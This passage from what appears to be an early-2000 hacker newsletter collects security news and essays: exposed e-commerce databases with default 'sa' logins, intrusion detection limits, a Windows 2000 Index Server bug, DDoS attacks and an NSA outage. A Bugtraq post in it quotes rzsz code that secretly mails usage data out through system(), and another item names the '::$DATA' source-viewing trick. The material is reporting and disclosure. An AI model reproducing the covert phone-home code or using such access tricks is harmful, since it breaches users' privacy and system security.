the Internet and either was not password-protected or the password was viewable directly from the Web site. Credit card theft, a problem long lurking in the background of Internet commerce, leaped to the top of consumers' minds earlier this month when a computer intruder calling himself Maxus was able to break into CD Universe's database of user credit cards. There's still speculation about how he did it. But perhaps Maxus didn't have to work so hard. Last week, MSNBC was able to view nearly 2,500 credit card numbers and other data essentially by browsing e-commerce Web sites using a commercially available database tool rather than a Web browser. Not only were the sites storing the credit cards in plain text in a database connected to the Web -- the databases were using the default user name and in some cases, no password. These basic security flaws were found by a legitimate Russian software company named Strategy LLC, according to CEO Anatoliy Prokhorov, and shared with MSNBC. He says he tried contacting some of the companies first and got no response. "From our point of view this is just unprofessionalism in a very high degree that's not explainable," Prokhorov said. His company writes software that helps consumers compare prices across multiple e-commerce sites, so his developers become familiar with data structures at hundreds of e-commerce sites. He says they weren't looking to find security flaws, but rather stumbled on these. "This is just a hole we passed by, an open door. Our people were amazed." But security experts were not. Given the speed required to succeed in the fast-paced Internet economy, companies are in a big hurry to publish working Web sites and often skimp on security measures. "This is a microcosm of what's out there," said Elias Levy of SecurityFocus.com. Levy's site was the first to report the CD Universe break-in last weekend. "One could only imagine what they would have found if they were looking for problems ... The problem is fairly widespread, and what Anatoliy has found is a small snapshot." Prokhorov also contacted SecurityFocus.com with his information, and the site today will issue its own report based on its independent investigation. The security flaws Prokhorov found involve more than just easy-to-steal credit cards. At all seven sites, MSNBC was able to view a wide selection of personal data including billing addresses, phone numbers and in some cases, employee Social Security numbers. Prokhorov sent the list and instructions to MSNBC on Tuesday. It included about 20 Web sites which either had no password protection at all on their database servers -- in each case, they were running Microsoft's SQL Server software -- or had password information exposed on their Web site. Connecting to all the sites was as simple as starting SQL Server and opening a connection to the Web site. (Note: Microsoft is a partner in MSNBC.) Some of the sites didn't include personal information; they are not included in this report. The others -- PMIWeb.com, Softwarecloseouts.com, EPCdeals.com, Expressmicro.com, Computerparts.com, Directmicro.com and Sharelogic.net -- were all contacted 24 hours before this story so they could close the security hole. While the flaws are obvious, assessing blame is a much more sticky business. There's a mounting concern that small businesses are particularly vulnerable to attack; many don't have computer experts on staff. Other times, non-technically savvy business owners take lowball bids from developers who promise a secure Web site but don't deliver. Then there are inherent problems in software itself that make flaws more likely. In some cases, the server-side code underlying a Web page is viewable if a browser places "::$DATA" at the end of the page's Web address. That code, normally hidden, can contain any usernames, passwords and other information about any computer connected to that server. This flaw was revealed over two years ago and has since been patched. Four of the vulnerable sites MSNBC found were hosted on the same Web server and had not plugged this hole. But even without knowing that technique, an intruder could have entered the sites anyway -- the username required for entering the database was the default "sa," which stands for "system administrator"; the password was the name of the company. "We used a developer, and obviously the developer didn't take that flaw into consideration," said a spokesperson for the sites. "The flaw could have lied within the software, but maybe the developer should have taken that into consideration ... and one thing we didn't do, we didn't hire a security company to come in and test our Web site." Getting a second opinion when building an e-commerce site is a good idea, said security expert Russ Cooper, who maintains the popular NTBugTraq mailing list. "Make a condition of the contract that it has to pass scrutiny of another individual who tests the site," Cooper recommended. The fundamental problem, he said, is that developers have no liability for flaws they leave behind in e-commerce sites. Merchants are responsible for the cost of any stolen merchandise, while most developer contracts make clear they are not responsible for what happens with a site they build. "So a lot of people end up with a working site but not a secure site." The other three vulnerable sites MSNBC visited simply used "sa" as the username for their database, and no password. Average consumers have no way of knowing how well-guarded their personal information is when they submit it to a Web site. Levy said the problems MSNBC found at these seven sites are hardly isolated. "The blame falls on more than one person. You can't rush out to set up an e-commerce site regardless of how much you want to make money... Many people don't give (security) a second thought," he said. One of the fundamental flaws in all these sites -- and, experts say, in many other sites -- is the storing of private consumer information in the first place. While encryption techniques that scramble the data are available, it's often kept on a computer in plain text -- one step away from the Internet. While that's more convenient, experts agree it's a bad idea. "My advice is, if nothing else, don't store the data where it physically has access to the Web," said Wesley Wilhelm, a fraud prevention consultant at the Internet Fraud Prevention Advisory Council. "Take them off every night and make a sneakernet run." As for consumers, there isn't much they can do to ascertain how well a Web site is guarding their personal information. Some experts suggest using only one card online, and religiously checking credit card bills. While consumers are liable for at most $50 of fraudulent purchases, they are responsible for catching them and alerting their bank. MSNBC's Curtis Von Veh contributed to this story. @HWA 139.0 Good IDS article from Security Portal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Dragos Ruiu http://securityportal.com/closet/closet20000112.html Kurt Seifried, seifried@securityportal.com, for http://www.securityportal.com/ January 12, 2000 - Last week I did a general overview of IDS systems and anti-virus software, and why they may not be the answer. Well in some respects they aren't and in some they are. But I think the main issue is the current model of intrusion detection (be it host or network based, looking for bad packets or data in the case of anti-virus software) is flawed (and the alternatives have a ways to go). Now to back up that statement so I don't get flame roasted. Problem 1) Basic performance problems (machine): Let's take a system like Network Flight Recorder for example (and don't get me wrong, as current NIDS systems go, NFR is one of the best on the market), NFR hoovers up all the traffic and can log it and compare it against a set of rules (modules actually) to see if any matches known attacks. NFR can also have multiple detection units that report to a central authority, so you can detect scans more reliably. So like most people you have a pretty diverse network, some Solaris, some Cisco, some NT, and so on and so forth. If you want to detect as many attacks as possible, you need to load all the modules available, resulting in slower performance, because NFR is literally doing more stuff. This will also result in the highest number of false positives, which will require you to spend a lot of time "filtering" manually. You can of course reduce the number of modules you need by not loading the ones that detect NetWare specific attacks for example, the assumption being you have no NetWare servers, or at least none accessible to the Internet. This can be a problem because at some point you might attach a NetWare server to the network in say your Internet DMZ, or (accidentally or otherwise) make an existing internal NetWare server visible to the Internet. The other, related problem, is that you might not load modules to detect attacks on Radius servers (same assumption as the NetWare servers apply here), which you might regret at some later point, very close to this is the idea of removing modules for old attacks, that you have patched all your applicable servers for. The problem basically boils down to the fact that networks have a habit of changing, rather quickly, and new services, new operating systems, and old bugs have a way of getting in without the correct people being notified. To ensure you don't miss anything (as the NFR admin), regular port sweeps using tools like nmap would be required to make sure new machines don't pop up, or new services, this technique of course is not infallible. Problem 2) Basic performance problems (man): The man hours required to properly maintain and respond to an (N)IDS system vary, most of it depends on how much traffic you monitor, and how often you get attacked (so generally speaking bigger sites, higher profile sites, and the like will generate more work). I also don't know about you, but I don't want to spend 8 hours a day staring at packet logs, trying to figure out what is hostile and what isn't (and then responding to it). Even if all goes well and you detect an attack successfully, the most you can do about it is to firewall the perpetrator, and contact their network administrator, chances are the attack was spoofed, or launched from a compromised machine (even if 99% of hosts on the Internet are secure, that still leaves around 1 million that aren't by today's numbers). Unlike the physical world, where most people (criminals being a subset of people) can't afford to hop on a jet plane, scoot over to Australia, rattle a few doorknobs in the hopes that one is open and rob the place, the Internet allows just that. The problem of "false positives" is made worse by the number of low level attackers (known as "script kiddies") seems to be increasing, largely due to the propensity of free UNIX platforms (*BSD, Linux), hacking tools (Bugtraq, rootshell), and Internet access (especially high speed access like ADSL and cable). This will only continue for the foreseeable future, I don't know when or where it will level off (or start to decline for that matter) but I don't think it will be anytime soon. Problem 3) The intelligence solutions (beyond man and machine): So if machines can't do the job too well (separating the wheat from the chaff), and humans are too expensive, the obvious alternative (well maybe not obvious) is to get the machines to behave more like people (or living organisms at all for that matter). The immune system is an amazing piece of work. With only rudimentary "intelligence" it manages to keep you relatively safe from known threats, but even more interestingly, it manages to adapt quickly to new threats (it doesn't always work perfectly, AIDS for example seems to be able to avoid the immune system by disabling it). So why not build a piece of software that emulates this, and use it to detect attacks? Well this is exactly what some people have been working on (in other fields as well, such as anti-virus software). One such result (from the Computer Immune Systems project at the University of New Mexico) is stide, which runs on several UNIX platforms and is available for free. Each TCP connection is represented by a compressed 49 bit string that represents a connection (IP from, IP to, port to, 80 bits of information in all). Speaking (in simplified terms) stide monitors the network and builds a list of ok traffic (known as "self"), and as these connections are seen more often they "mature". Once stide has a good picture of "self" it can compare all traffic (in the form of the 49 bit identifier) against its "self" (the known good traffic), and decide whether or not it is legitimate. Now this wouldn't work too well since if during the time you spent monitoring your webserver, only the people that connected would be allowed in the future, so stide does not match the entire string, rather it only requires 12 of the 49 bits to match. This sounds promising, but the real kicker is that in their tests, stide did a remarkably good job of identifying attempted intrusions, but more importantly the number of false positives was relatively low (compared to tradition (N)IDS systems). So what's the catch to stide? Well it seems it requires a large amount of CPU time, and doesn't scale terribly well, but this may not be an incredibly large problem. By installing the stide software on all hosts the load is distributed (the host only monitors its own traffic), and generally speaking most hosts do not communicate with too many other hosts, or in the case of servers, tend to communicate with only a few protocols (such as ftp), making the list of "self" relatively short. This also eliminates the single point of failure possible with current (N)IDS systems, but more importantly, assuming software packages like stide mature and actually are viable, each machine (metaphorically speaking) will take care of itself, and require a minimum of human intervention. The future? In any case there are other organizations working on similar solutions to similar problems, the most notable being IBM. IBM is developing an anti-virus system where computers running the software will identify potentially dangerous pieces of software, and send them to a central site to be analyzed, if it turns out to be a virus the system will be able to generate a countermeasure for it (typically a virus signature, and a removal process) and distribute it to all the machines running this software. This solves all the major current problems with anti-virus software (that I covered on the 5th of Jan, 2000), and makes for a much more effective response (of course the virus writers might start attacking the central site(s) in order to help their new viruses spread). This system won't be available for several years most likely, but as various pieces of it come online, network administrators (with the money to afford it) will benefit. Kurt Seifried(seifried@securityportal.com) is a security analyst and the author of the "Linux Administrators Security Guide", a source of natural fiber and Linux security, part of a complete breakfast. --kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----k yx----kyx----kyx----kyx-- And the previous week's aticle that it referred to: --kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx----k yx----kyx----kyx----kyx-- Network Intrusion Detection Systems and Virus Scanners - are they the answer? Kurt Seifried, seifried@seifried.org, for http://www.securityportal.com/ January 5, 2000 - It takes a lot less effort to destroy and break things, than it takes to build and fix them. This is nowhere more evident then computer networks. Corporations, governments, universities and other organizations spend large sums of money on computer network infrastructure, and the cost of keeping them running is not trivial. And this doesn't even take into consideration malicious attacks and security controls which add even more cost to building and maintaining a network of computers. Unfortunately for most of us, the desktop is Microsoft centric, which means most of us can't do a whole lot to it to make it more secure. If you run Windows 95 or 98 you get no file permissions (and hence the computer has absolutely minimal protection from hostile acts), if you run Windows NT 4.0 Server or Workstation the default settings are full control for everyone for all files on the system, and registry keys (fixing this takes a long time, and will break some applications). Let's assume for a minute you have fully locked down the machines, users cannot modify them, they are physically secure, and so on, are you secure? No. New problems for various operating systems are made public all the time, these range from minor security issues to full blown "take control of the machine remotely and do what you want with it". Also, due to the single user oriented nature of Windows there exists a whole class of malicious software called viruses, which typically consist of some code to exploit a program or system bug, a replication mechanism, and possibly some additional software that ranges from annoying to destructive. What are network and systems administrators to do in such an increasingly hostile world? Anti-virus software Entire classes of software with literally hundreds (ok, maybe not hundreds but a lot) of companies producing products have sprung up over the last few years, and is now beginning to consolidate into several large companies providing complete product lines to cover everything you could want, and dozens of medium to small sized companies with sometimes just one main product. Of this the anti-virus software vendors were one of the original groups of vendors to start writing add-on software to enhance the security (which was non-existent on Microsoft platforms at the time) available for ensuring software that you used was not malicious. This has lead to an "arm's race" (apologies for using this but it is a decent analogy) between virus software writers, and anti-virus vendors. Most anti-virus software packages started out as simple programs that checked the files against a known list of "bad" ones (i.e. via checksum and so forth), which lead to polymorphic viruses (that is the software would modify itself a little bit each time, thus defeating this detection technique). The anti-virus vendors then started scanning the actual binary code for the various pieces of code present in viruses, and heuristic packages that supposedly figure out what the software will do, and based on that can block it if it is considered malicious (if this worked properly though we wouldn't be needing anymore virus signature updates now would we?). Additionally things have gotten more complicated, with the integration of anti-virus software with such services as email, www and ftp. A small list of "new" problems with anti-virus software that have come out in the last few months: compression of the virus with a little used compression algorithm successfully fooled most anti-virus packages (this was fixed in most of them) compression of the virus with some XOR'ing of the data, successfully fooled most anti-virus packages storing the virus in directories not scanned by the anti-virus software, such as "Recycle bin" in windows (user can configure the software to scan that directory usually) exploitation of various buffer overflows in software packages like Outlook so that the virus is run without the user actually being asked if they want to save or run the attachment (fixed) usage of system calls and software in Windows, such as having Outlook email everyone in your address book a copy of the virus addition of some characters to the attached file successfully fooled email anti-virus packages That's all I could find from the last month or two of Bugtraq. Obviously the anti-virus vendors have a ways to go before their products can even be called remotely reliable. The last dozen or so viruses that spread via email have all left the anti-virus vendor community flat footed, the Melissa virus (which was relatively harmless) resulted in several large sites (Microsoft, Intel, etc.) shutting down the mail servers (and in some cases it overwhelmed mail servers causing them to be effectively shut down). It is obvious that anti-virus vendors will always be playing catch-up with the virus writers, which wouldn't be such a problem if anti-virus software updates were released quickly and people installed them. This is however impossible. The life cycle of a virus looks something like: 1. virus is written, tested, possibly deployed on a test network (computers are cheap now) and otherwise honed 2. virus is released, possibly on a selected target (university campus, corporate network, etc.) 3. virus (if "successful" in a biological sense) spreads like wildfire, possibly causing severe damage (such as wiping motherboard BIOS chips) 4. someone notices the strange activity, takes whatever data is left over, and sends it to an anti-virus vendor - this is the first point at which people start taking corrective steps, the virus has already had time to spread 5. the virus is analyzed, decompiled, and otherwise ripped apart, a signature is created 6. typically the anti-virus vendor will share data with other competitors, they may or may not do this promptly 7. the anti-virus vendors issue bulletins, make the update (if one exists yet) available 8. some customers with support contracts and so on will be notified, some will have automated distribution systems for the update, resulting in a rapid deployment of the fix, most will not 9. network and system administrators, home users, and so on possibly read the advisory or hear about the virus on CNN, they get the update (which can be near impossible during peak times) and install it During steps 2, 3, 4, 5, and up till 6 the virus will spread unchecked. Once an update is created and distributed the virus will only spread to systems without protection (a good sized percentage). The amount of effort it takes to install software on millions of computers is horrendous, even when heavily automated, compared to the amount of effort a virus author spends, the ROI (return on investment) can be significant. Intrusion detection software Directly related to anti-virus software is intrusion detection software (sometimes refereed to as IDS or NIDS). I'm going to start with a brief explanation of the various intrusion software technologies and types since they overlap and can be somewhat convoluted. As a rule of thumb the software has to run on a computer system (that's a pretty safe rule for most software packages actually), and this machine can either be dedicated to the task of monitoring the network and other systems, or the software can be an additional component that runs on a production server. For example we have NFR (Network Flight Recorder) which is an entirely network based system, you have one or more collection machines (a dedicated box, either an appliance system or something you have built yourself), which analyze data, and can funnel it all to a central collection point (allowing you to more easily detect distributed attacks and see patterns of activity). Then there are a variety of products that are loaded onto client machines and report to a central machine via SNMP (or some other protocol), which analyses the data and looks for attacks and so forth, and in between the two are some hybrid systems. As with anti-virus software vendors a major problem with (N)IDS systems is the time frame between when an attack is discovered, and when the (N)IDS systems are updated to detect and react to it accordingly (the life cycle is pretty much identical to that of a virus's life cycle). The next major differentiation is how active a role the software will take when it detects an event, for example some systems can be set to lock out a host computer if it appears hostile, whereas some will simply compare files against signatures to see if they have changed or not and generate a report (and the extreme of this would be forsenic software used "after the fact" to try and determine what happened). This leads to one of the fundamental problems of intrusion detection systems. These systems are typically heavily automated, and sometimes make use of neural networks, artificial intelligence and other techniques in an effort to make them more accurate and useful. If you set the detection threshold too low you will detect more events, resulting in a large number of false alarms, and wasted effort. If you set the detection threshold too high you run the risk of missing events that might prove critical to continued operations (a.k.a. a bad person might get in and delete all your archived .... research data). In an effort to get the best of both worlds (low detection threshold, with a minimum of false alarms, and no important events missed) the systems make heavy use of rule sets, content based analysis, and so forth. Unfortunately even the best of these systems are far from perfect. In addition to this you have to act on events, monitoring the network and generating a detailed report of attacks, which is useless if you do not use it constructively. Again we discover a fundamental problem, if you give control up to the computer there is a good chance an attacker will be able to abuse it and possibly circumvent it, whereas if you have a human respond to each event the cost and time involved would be prohibitive. Striking a balance between a low detection threshold and a high one, in addition to letting either the computer handle it, or a human is a critical process (it is not a single decision, since you should be evaluating results constantly and fine tuning it). The same applies to anti-virus software, you want to get the updates to the machines as fast as possible, which means automation where possible, however there are some basic issues that can severely delay the time between a virus rampaging around networks, and a successful counter to it. Even if you have instantaneous updates of your anti-virus software and intrusion detection systems, there is still a timeframe in which you can be successfully attacked. But this doesn't make anti-virus software and intrusion detection systems worthless, far from it. Security is about risk management and risk minimization, often within a budget and time constraints (few organizations can write a blank check as far as computer security is concerned). The real question is will the ROI (return on investment) be worthwhile, e.g. armed security guards at every workstation to make sure no-one tampers with them would be nice, but not terribly cost effective. In addition to this there are intrusion detection software packages that only detect an attack after the fact, such as tripwire. This is however not as useless as it would seem at first blush (someone stole all the silverware, guess we should buy a new set). A part of all security incidents is discovering the scope of the problem (did they only get into one machine, or did they get into a few hundred?), and tools like tripwire can make this task much more easy (in fact some vendors are now shipping integrity checking software that can be loaded onto a bootable floppy so you can get a very secure snapshot of the system that you can compare securely, of course it requires a server reboot). Conclusion Computer security doesn't come in nice shrink wrapped box for $99.95 (after a $50 rebate). Computer security is an ongoing process, with constant re-evaluation and changes, as new threats and solutions are released, you need to be able to react to them effectively. Ideally vendors would ship software that was not susceptible to viruses (this is possible), nor susceptible to user/network/random events resulting in improper operation (like giving someone a root shell remotely). This isn't going to happen for along time however (although there is a variety of hardening software becoming available). Anti-virus software and intrusion detection systems (passive and active) are all part of a healthy security policy implementation. Any security plan implementation, when properly done will require some degree of human intervention. If possible you should dedicate people to the task, and possibly have them fulfill other optional duties (like evaluating new software for possible future use). If the people you have tasked are responsible for support, chances are they will spend the majority of their time running around and putting out fires instead of preventing a massive firestorm. Kurt Seifried(seifried@seifried.org) is a security analyst and the author of the "Linux Administrators Security Guide", a source of natural fiber and Linux security, part of a complete breakfast. Related links: Virus paper: http://www.sophos.com/virusinfo/whitepapers/futurevi.html IBM article / interview on new virus detection / eradication technology http://www.ibm.com/stretch/mindshare/white.phtml Network intrusion activity: http://www.sans.org/y2k.htm 5 (N)IDS vendors respond to questions: http://www.gocsi.com/ques.htm Lessons Learned in the Implementation of a Multi-Location Network Based Real Time Intrusion Detection System: http://www.zurich.ibm.com/pub/Other/RAID/Prog_RAID98/Full_Papers/Puldy_sl ides.html/index.htm Design of an NIDS system: http://www.cs.ucsb.edu/~kemm/netstat.html/projects.html File integrity checking software: http://www.tripwiresecurity.com http://www.suse.de/~marc/ @HWA 140.0 Win2000 security hole a 'major threat' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.zdnet.com/zdnn/stories/news/0,4586,2429334,00.html?chkpt=zdnntop Win2000 security hole a 'major threat' Six banks and three major PC makers are affected by a bug that lets attackers view files stored on Microsoft Index Server. Microsoft issues patch. By David Raikow, Sm@rt Reseller UPDATED February 1, 2000 9:37 AM PT Windows 2000 is not scheduled for release until Feb. 17, but Microsoft has already released the first patch affecting the long-awaited operating system. The patch, released by Microsoft on Wednesday, repairs two different security bugs in Microsoft Index Server, the more egregious of which allows hackers to view files stored on a target Web server. Index Server is an add-on to Windows NT 4.0 and is built into Windows 2000 (in the form of Indexing Services). Index Server provides developers with Active Scripting and query management capabilities. The more dangerous of the two problems, dubbed the "Malformed Hit-Highlighting Argument Vulnerability" by Microsoft (Nasdaq: MSFT), was spotted by David Litchfield of Cerberus Information Security on Jan. 17 and immediately reported to Microsoft security. The bug allows attackers to view files stored on a target Web server and represents a major threat, according to Litchfield. "Of course, ideally you make sure there's no sensitive data on your Web server, but this can be incredibly difficult," Litchfield said. "A lot of servers have account passwords and user names on them. Even under the best of circumstances you can end up with account information and sometimes credit card numbers stored in temporary files on the server. You should clear those files out regularly, but you still end up with a 'race condition' where attackers can try to grab them before they're erased." Microsoft: It's all serious "It's not for us to assess the seriousness of this problem, because we take all security risks seriously," said Microsoft Security Manager Scott Culp. "The important thing now is that the patch is out, and that it fixes the problem. All of our customers should check out our security site." However, Litchfield's investigation of the bug suggests that the majority of Windows-based servers are at risk. He confirmed that at least six banks and three major computer manufacturers were affected by the bug. "The problem is that Index Server is active by default, so most people don't even realize they've got it on. Even if they see an MS alert, they're probably not going to realize that it applies to them," Litchfield said. Culp acknowledged that many users may have the Index Server active without realizing it. "Of course, from a security perspective, you shouldn't offer any services you don't use," Culp said. "We want to make sure our customers are educated about this, and that they are aware of which services they have active and how to disable what they don't need. We've also given Windows 2000 tighter defaults and made it much easier to configure." Second bug relatively minor The second of the two bugs allows an intruder to access information about the targeted network, but it is considered relatively minor. Although several specialists assert that this problem has been publicly discussed for several months, Culp stated that Microsoft only became aware of it within the past two weeks. According to Culp, both of these problems were discovered too late to be fixed in the shipping version of Windows 2000. "These came to our attention in mid-January, and Windows 2000 went out to OEMs and many customers Dec. 15. It's a shipping product, and we're supporting as any other shipping product." Microsoft released to manufacturing Windows 2000 on Dec. 15 and delivered it to hardware makers and some other key partners on that date. Large customers and developers received the gold code in early- to mid-January. The product will be available through retail starting Feb. 17. @HWA 141.0 New hack attack is greater threat than imagined ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Dragos Ruiu http://www.theregister.co.uk/000127-000005.html?&_ref=1188363377 New hack attack is greater threat than imagined It was news a month ago; days later it vanished. The mainstream press may have forgotten it, but security specialists gathered in California last week for the sixth RSA Conference to consider the growing trend in malicious computer assaults called distributed denial of service (DDoS) attacks. Using tools called trin00 and tribe flood network (TFN), intruders can commandeer hundreds, possibly thousands, of separate, unsuspecting clients to launch a flood which can bring a network down in a torrent of packets all appearing to come from different sources, making it impossible to identify the origin. Dealing with this sort of assault can be maddening for the primary victim. The clients from which the attack is launched are themselves intermediate victims who rarely know that their systems have been compromised. They are in diverse locations around the world, administered by people who speak different languages, making it nearly impossible for one victim to explain to another how to cope with the threat. Security experts are not optimistic. The tools do not require an intruder to gain root access to a system, but can be uploaded via a number of simpler exploits, many of which can be scripted to run automatically, and even multi-threaded to run very, very fast. Finding weak systems to use as clients for a distributed attack is neither difficult nor prohibitively time consuming. More ominously, DSL and cable modems, which remain connected around the clock, make it possible to launch attacks through the growing number of private Linux boxes now online. "We've already seen these attacks coming through Linux boxes," ISCA Director of Research Services David Kennedy told The Register. "And there's no reason why it can't be ported to the Win-32 [operating system]," he added. To further complicate matters, merely killing the process during a distributed flood attack is not adequate to end it. So long as the hundreds of clients remain infected, an attack can be resumed, Kennedy says. We note that communicating with the owners and administrators of hundreds of compromised clients, and gaining their cooperation, would be virtually impossible. The victim is, for all practical purposes, at the mercy of the attacker. The FBI's National Infrastructure Protection Center (NIPC) has developed an application to detect the malicious tools, though the first indication that they've been installed will usually be a phone call from a frantic sysadmin trying desperately to block the onslaught of packet traffic. We say 'phone call' because a distributed attack capitalises on so much bandwidth from so many sources that it literally overwhelms entire networks. Under those circumstances, e-mail is hardly going to work. An ISP can turn off the attack, provided its administrators are well enough acquainted with the problem; but there again, nothing can stop an attacker from firing up his hundreds of compromised clients hours or days later if he chooses. It gets worse; most of the more obvious defences are problematic. For example, a firewall configured to catch a distributed flood attack would also interrupt such utility functions as ping and traceroute, which are commonly used by administrators and power users, Kennedy noted. The tools are in constant development within the hacker underground; new and better versions are released regularly. Most worrying is a shift to scripted attacks which allow unsophisticated users, such as bored teenagers, half-assed hacker wannabes and clueless script kiddies to launch them. The tools are getting more powerful, slicker and easier to use. Defences are not. Defences require the infected clients, not the end victims, to take action. Human nature being what it is, we reckon the end victims are pretty well on their own. The NIPC offers an unsettling insight: "Possible motives for this malicious activity include....preparation for widespread denial of service attacks." We wonder what "widespread" means here. If one malicious hacker can exploit hundreds of clients worldwide and retain them for repeated abuse, what might a hundred accomplish? And what effect might that have? Could enough bandwidth be gobbled up to crash large portions of the Net? Could ISPs be overwhelmed for hours, even days? Could infrastructure be at risk? The NIPC refuses to say, but our imaginations are very much stimulated by the possibilities. And we reckon yours ought to be as well. ® @HWA 142.0 NSA gets bitten in the ass too ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Dragos Ruiu ( I would be interested to find out if this was a DDoS.... since that is the topic du jour. I would imagine NSW Dragon got a workout chasing these guys down, successfully it seems - but we'll never hear about it officially I think. If that is the case, congrats Ron. --dr :-) (Comments where Dragos' - Ed) http://abcnews.go.com/sections/us/DailyNews/nsa000129.html NSA Confirms `Serious Computer Problem' W A S H I N G T O N, Jan. 29 - The super-secret National Security Agency confirmed tonight that it had a "serious computer problem" last week that affected its ability to process intelligence information. The agency issued a brief statement a few hours after the outage was reported by ABCNEWS. Sources characterized the problem as the biggest computer failure in the history of the NSA. From Monday night until late Thursday, computers at Fort Meade, just outside Washington, were unable to process the millions of communications intercepts flowing in from around the world via a series of U.S. satellites. The statement said the agency "is currently operating within the window of normal operations." NSA Director Air Force Lt. Gen. Michael Hayden told ABCNEWS that the system has been almost totally rebuilt in the past five days, although it is not quite fully up yet. Officials said it did not appear to be sabotage, just a computer system overwhelmed trying to digest data. $1.5 Million Problem The NSA said it took thousands of man-hours and some $1.5 million to get the computers up and running again at the agency's headquarters at Fort Meade, Maryland. As a result of the unprecedented blackout of information, analytical reports from Fort Meade that turn intercepted foreign telephone, cable and radio messages into meaningful data for the rest of government, were halted. "This problem ... did not affect intelligence collection, but did affect the processing of intelligence information," the statement said. "The backlog of intelligence processing is almost complete, and NSA is confident that no significant intelligence information has been lost." The Washington Post quoted one official describing the outage as a "software anomaly." "As of now, there is no evidence other than this was a system stressed to meet day-to-day operational pressures," the paper quoted the official as saying. Dangerous Times This was an especially dangerous time for something like this to happen. The system uses the data to track terrorists, among other things, including suspected ringleader Osama bin Laden - monitoring them, issuing warnings and keeping the United States one step ahead. "This problem, which was contained to the NSA headquarters complex at Fort Meade, Md., did not affect intelligence collection, but did affect the processing of intelligence information," the agency statement said. "NSA systems were impacted for 72 hours." "Contingency plans were immediately put into effect that called on other aspects of the NSA system to assume some of the load," the agency statement said. "While intelligence collection continued, NSA technicians worked to recover the IT (information technology) infrastructure. That backlog of intelligence processing is almost complete and NSA is confident that no significant intelligence information has been lost." The latest incident follows the failure of a critical U.S. spy satellite system on New Year's Eve, the most significant known casualty of the Year 2000 computer glitch (see related story). `No Such Agency' Until a few years ago, the National Security Agency - known around Washington as "No Such Agency" - was so secret there was no public acknowledgment by the government of its existence and employees could be disciplined for merely saying they worked there. It specializes in electronic intelligence gathering through satellites, telephone intercepts and other methods. The Defense Department acknowledged earlier this month that it made mistakes in its pre-New Year's Eve testing of a Y2K correction for a computer system that processes imagery from intelligence satellites. The computer system broke down that night, interrupting the flow of by satellite information for several hours. However, the Pentagon insisted the trouble did not jeopardize U.S. national security. ABCNEWS' John McWethy and The Associated Press and Reuters contributed to this report. @HWA 143.0 rzsz package calls home if you don't register the software. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From BUGTRAQ From: Kris Kennaway <kris@HUB.FREEBSD.ORG> To: <BUGTRAQ@SECURITYFOCUS.COM> Sent: Saturday, January 29, 2000 7:14 PM Subject: rzsz emails usage stats without user consent Recent versions of the (shareware) UNIX rzsz package from Omen Software, available from ftp://ftp.cs.pdx.edu/pub/zmodem/, contain the "feature" that if your version is unregistered, it will send mail to rzsz@omen.com each time you upload and download using the software - rz.c and sz.c contain the following code: #ifndef REGISTERED /* Removing or disabling this code without registering is theft */ if ((Totfiles > 0) && (!Usevhdrs)) { sprintf(endmsg, "echo Unreg %s %s %ld %ld | mail rzsz@omen.com", Progname, VERSION, Totfiles, Totbytes ); system(endmsg); canit(); sleep(4); fprintf(stderr, "\n\n\n**** UNREGISTERED COPY *****\r\n"); fprintf(stderr, "Please read the License Agreement in rz.doc\r\n"); fflush(stderr); } #endif This change was detected because the FreeBSD ports system uses an MD5 checksum to verify the integrity of downloaded software - the rzsz.zip file has a habit of changing regularly, and after one such change this addition was discovered. Thanks for Marcin Cieslak <saper@system.pl> for identifying this problem. The rzsz port has since been removed from the FreeBSD ports collection :-) Kris Kennaway ---- "How many roads must a man walk down, before you call him a man?" "Eight!" "That was a rhetorical question!" "Oh..then, seven!" -- Homer Simpson @HWA 144.0 Clinton calls Internet Summit on the DDoS threat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://webcrawler-news.excite.com/news/r/000211/22/news-tech-hackers Web Probe Widens, Clinton Calls Internet Summit Updated 10:23 PM ET February 11, 2000 By Dick Satran SAN FRANCISCO (Reuters) - U.S. investigators tracking hackers who shut down top Web sites turned their focus to the sites used to launch the attacks on Friday as President Clinton called a summit on Internet security for next week. The Federal Bureau of Investigation was backtracking through sites that were penetrated and used as "zombies" to hit others. The agency, at a briefing this week, underscored the importance of "unwitting third parties" used to conceal themselves by launching massive coordinated attacks on the top e-commerce sites. The University of California-Santa Barbara said that its computer system was used to aim an attack at the CNN Web site brought down in the week's wave of Internet sabotage, a spokesman said Friday. The university said it was providing details to the FBI for the investigation. "ZOMBIE" ATTACKER FOUND In Palo Alto, meanwhile, computer security company Network Associates Inc (NETA.O) said it had located another one of the "zombies" used to launch the attacks -- a computer in Germany which has since been disconnected from the Internet. But while the university and the security firm stepped forward, computer experts said scores more remained silent, fearing legal action or involvement in costly criminal probes. "People want to stay out of the way," said Stuart McClure, president of the Irvine, California-based Ramparts Security Group. "People are real sensitive about these issues -- they think the perception would be negative." Perceptions of Internet security took another hit on Friday when a small California Internet company said an unrelated hacker attack on its system this week had apparently gained access to consumer credit card numbers. RealNames, a San Carlos, California, business, said the extent of the damage was hard to assess because the attack had come through mainland China, and the connection appeared to have shut down while the hackers were downloading data. "Our best guess is that this was done by a traditional hacker, whose goal is not to steal but to prove that he has the ability to steal," said RealNames chief executive Keith Teare, whose company sells a simplified Internet address system to about 50,000 customers. In Washington, Clinton's summit is expected to boost broader cooperation in a young industry that's growing fast and hasn't made security a high priority. The industry, in turn, wants to give advice to federal regulators seen as too unsophisticated in Web ways to have much impact. Clinton warned not to expect Tuesday's meeting to come up with an "instantaneous solution" to a wave of hacking attacks which this week took down popular sites Yahoo!, the largest independent Web site, leading retailers Buy.com, eBay, Amazon.com and the news site CNN.com. While computer security has often vexed individual computer users linked to the Internet, major Web sites have been hit only by sporadic outages, and nothing like the chaos of the past week. BROADER COOPERATION The U.C.-Santa Barbara report was one of the first to indicate that the hackers' tracks were slowly being uncovered. FBI spokeswoman Debbie Weierman refused to comment on the UC-Santa Barbara report. She 